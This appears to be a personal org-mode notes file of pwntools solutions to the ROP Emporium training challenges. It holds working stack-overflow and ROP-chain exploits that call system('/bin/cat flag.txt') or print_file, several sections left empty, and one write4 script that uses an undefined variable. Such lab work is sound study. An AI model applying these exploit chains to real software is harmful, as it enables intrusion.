#+title: ropemporium
#+HUGO_BASE_DIR: ~/club/
#+hugo_section: ctftime
#+startup: content
#+hugo_tags: chals
#+hugo_categories: pwning


* ret2win
ret2win means 'return here to win' and it's recommended you start with this challenge. Visit the challenge page by clicking the link above to learn more.
** 32bit
#+BEGIN_SRC python
from pwn import *

elf = context.binary = ELF('ret2win32')

# target address
ret2win_addr = elf.functions.ret2win.address

# start process.
io = process(elf.path)

# send cyclic pattern to crash
io.recvuntil("> ")
io.sendline(cyclic(64))

# Wait for the process to crash
io.wait()

# Open up the corefile
core    = io.corefile
eip_val = core.eip

info('Loading core dump to collect the details')

info("==" * 30)
offset  = int(cyclic_find(eip_val)) # get offset to EIP
info('EIP is located at offset  {o}'.format(o=offset))
info('ret2win function address  {a}'.format(a=hex(ret2win_addr)))
info("==" * 30)


# send the payload and get the phlaaag
p = process(elf.path)
p.recvuntil("> ")
p.sendline("A" * offset + p32(ret2win_addr))
info(p.recvuntil("}"))
#+END_SRC
** 64bit
#+BEGIN_SRC python
from pwn import *

elf = context.binary = ELF('ret2win')

# target address
ret2win_addr = elf.functions.ret2win.address

# start process.
io = process(elf.path)

# send cyclic pattern to crash
io.recvuntil("> ")
io.sendline(cyclic(64, n=8))

# Wait for the process to crash
io.wait()

# Open up the corefile
core    = io.corefile
rip_val = core.rip
print(" ----- ", rip_val)
info('Loading core dump to collect the details')

info("==" * 30)
# offset  = int(cyclic_find(rip_val)) # get offset to EIP

offset = int(cyclic_find(core.fault_addr, n=8))
info('RIP is located at offset  {o}'.format(o=offset))
info('ret2win function address  {a}'.format(a=hex(ret2win_addr)))
info("==" * 30)


# send the payload and get the phlaaag
p = process(elf.path)
p.recvuntil("> ")
p.sendline("A" * offset + p64(ret2win_addr))
info(p.recvuntil("}"))
#+END_SRC

* split
Combine elements from the ret2win challenge that have been split apart to beat this challenge. Learn how to use another tool whilst crafting a short ROP chain.
** 32bit
#+BEGIN_SRC python
from pwn import *

e = context.binary = ELF('split32')
bin_cat = e.search('/bin/cat flag.txt').next() # "/bin/cat flag.txt"

def overflow(p, data):
    p.recvuntil('> ')
    p.sendline(data)

p = process(e.path) # start the process()
overflow(p, cyclic(64, n=4)) # padding offset to EIP

p.wait() # Wait for the crash to occur

# find EIP offset from coredump
offset = cyclic_find(p.corefile.fault_addr, n=4)

rop = ROP(e) # ROP class so we can identify symbols and gadgets
rop.system(bin_cat) # system("/bin/cat flag.txt")

p = process(e.path) # start the process()
payload = fit({ offset: str(rop) }) # build payload

overflow(p, payload) # Send our payload

# Receive our flag and print it to screen
print("FLAG # -- > ", p.recvline().strip())
#+END_SRC
** 64bit
#+BEGIN_SRC python
from pwn import *

e = context.binary = ELF('split')

bin_cat = e.search('/bin/cat flag.txt').next() # "/bin/cat flag.txt"

def overflow(p, data):
    p.recvuntil('> ')
    p.sendline(data)

p = process(e.path) # start the process()
overflow(p, cyclic(64, n=8)) # padding offset to RIP

p.wait() # Wait for the crash to occur

# find EIP offset from coredump
padding = int(cyclic_find(p.corefile.fault_addr, n=8))

rop = ROP(e) # ROP class so we can identify symbols and gadgets
rop.system(bin_cat) # system("/bin/cat flag.txt")

p = process(e.path) # start the process()

payload = fit({ padding: str(rop) }) # build payload
overflow(p, payload)                 # Send our payload

# Receive our flag and print it to screen
print("FLAG # -- > ", p.recvline().strip())
#+END_SRC
* callme
Chain calls to multiple imported methods with specific arguments and see how the differences between 64 & 32 bit calling conventions affect your ROP chain.
** 32bit
#+BEGIN_SRC python
from pwn import *

e = context.binary = ELF('callme32')
rop = ROP(e) # Find ROP gadgets

def overflow(p, data):
    p.recvuntil('> ')
    p.sendline(data)

p = process(e.path) # start the process()
overflow(p, cyclic(64, n=4)) # padding offset to EIP
p.wait() # Wait for the crash to occur

# find EIP offset from coredump
padding = int(cyclic_find(p.corefile.fault_addr, n=4))

gadget = p32(rop.find_gadget(['pop esi', 'pop edi', 'pop ebp', 'ret'])[0])
args   = p32(0xdeadbeef) + p32(0xcafebabe) + p32(0xd00df00d)

payload  = cyclic(padding, n=4)        # EIP Offset at 44
payload += p32(e.symbols["callme_one"])   + gadget + args
payload += p32(e.symbols["callme_two"])   + gadget + args
payload += p32(e.symbols["callme_three"]) + gadget + args

p = process(e.path)  # start the process()
overflow(p, payload) # send the payload
success(p.recvall()) # print the flag
#+END_SRC
** 64bit
#+BEGIN_SRC python
from pwn import *

e = context.binary = ELF('callme')
rop = ROP(e) # Find ROP gadgets

def overflow(p, data):
    p.recvuntil('> ')
    p.sendline(data)

p = process(e.path) # start the process()
overflow(p, cyclic(64, n=8)) # padding offset to EIP
p.wait() # Wait for the crash to occur

# find EIP offset from coredump
padding = int(cyclic_find(p.corefile.fault_addr, n=8)) # EIP Offset at 40
gadget  = p64(rop.find_gadget(['pop rdi', 'pop rsi', 'pop rdx', 'ret'])[0])
args    = p64(0xdeadbeefdeadbeef) + p64(0xcafebabecafebabe) + p64(0xd00df00dd00df00d)

payload  = cyclic(padding, n=8)
payload += gadget + args + p64(e.symbols["callme_one"])
payload += gadget + args + p64(e.symbols["callme_two"])
payload += gadget + args + p64(e.symbols["callme_three"])

p = process(e.path)  # start the process()
overflow(p, payload) # send the payload
success(p.recvall()) # print the flag
#+END_SRC
* write4
Find and manipulate gadgets to construct an arbitrary write primitive and use it to learn where and how to get your data into process memory.
** 32bit
#+BEGIN_SRC python
from pwn import *

e   = context.binary = ELF('write432')
p   = process(e.path)              # start the process()
rop = ROP(e)                       # Find ROP gadgets

def overflow(p, data): p.sendlineafter('> ', data)

overflow(p, cyclic(64, n=4)) # padding offset to EIP
p.wait()                     # Wait for the crash to occur

# find EIP offset from coredump
padding     = int(cyclic_find(p.corefile.fault_addr, n=4))
pop_edi_ebp = p32(rop.find_gadget(['pop edi', 'pop ebp', 'ret'])[0])
gadget      = p32(e.symbols.usefulGadgets) # mov dword [edi], ebp
print_file  = p32(e.symbols["print_file"]) # print_file fn()
bss         = e.bss()                      # .bss addr to write
p           = process(e.path)              # start the process()

payload  = b'A' * padding           # padding to reach EIP
payload += pop_edi_ebp              # pop edi; pop ebp; ret;
payload += p32(bss)                 # .bss addr to write
payload += b'flag'                  # string by string
payload += gadget                   # mov dword [edi], ebp
payload += pop_edi_ebp              # pop edi; pop ebp; ret;
payload += p32(bss + 4)             # write to bss after 4 bytes
payload += b'.txt'                  # string by string
payload += gadget                   # mov dword [edi], ebp
payload += print_file               # print_file fn()
payload += b'fill'                  # filler
payload += p32(bss)

overflow(p, payload)
success(p.recvall())
#+END_SRC
** 64bit
#+BEGIN_SRC python
from pwn import *

elf      = context.binary = ELF('write4')
rop      = ROP(elf)                     # Find ROP gadgets

payload  = b'A' * 40                    # padding
payload += p64(rop.find_gadget(['pop r14', 'pop r15', 'ret'])[0])
payload += p64(0x601028)                # .data addr
payload += b'flag.txt'                  # flag.txt parameter for print_file()
payload += p64(e.symbols.usefulGadgets) # mov qword ptr [r14], r15 ; ret
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(0x601028)                #  Address of flag.txt in .data
payload += p64(e.symbols.print_file)    # addr of print_file()

p        = process(elf.path)            # start the process()
p.sendlineafter("> ", payload)          # send payload
success(p.recvall())                    # print flag
#+END_SRC
* badchars
Learn to deal with badchars, characters that will not make it into process memory intact or cause other issues such as premature chain termination.
** 32bit
#+BEGIN_SRC python

#+END_SRC
** 64bit

#+BEGIN_SRC python

#+END_SRC
* fluff
Sort the useful gadgets from the fluff to construct another write primitive in this challenge. You'll have to get creative though, the gadgets aren't straightforward.
** 32bit
#+BEGIN_SRC python

#+END_SRC
** 64bit

#+BEGIN_SRC python

#+END_SRC
* pivot
Stack space is at a premium in this challenge and you'll have to pivot the stack onto a second ROP chain elsewhere in memory to ensure your success.
** 32bit
#+BEGIN_SRC python

#+END_SRC
** 64bit

#+BEGIN_SRC python

#+END_SRC
* ret2csu
Learn a ROP technique that lets you populate useful calling convention registers like rdi, rsi and rdx even in an environment where gadgets are sparse.
** 32bit
#+BEGIN_SRC python

#+END_SRC
** 64bit
#+BEGIN_SRC python

#+END_SRC
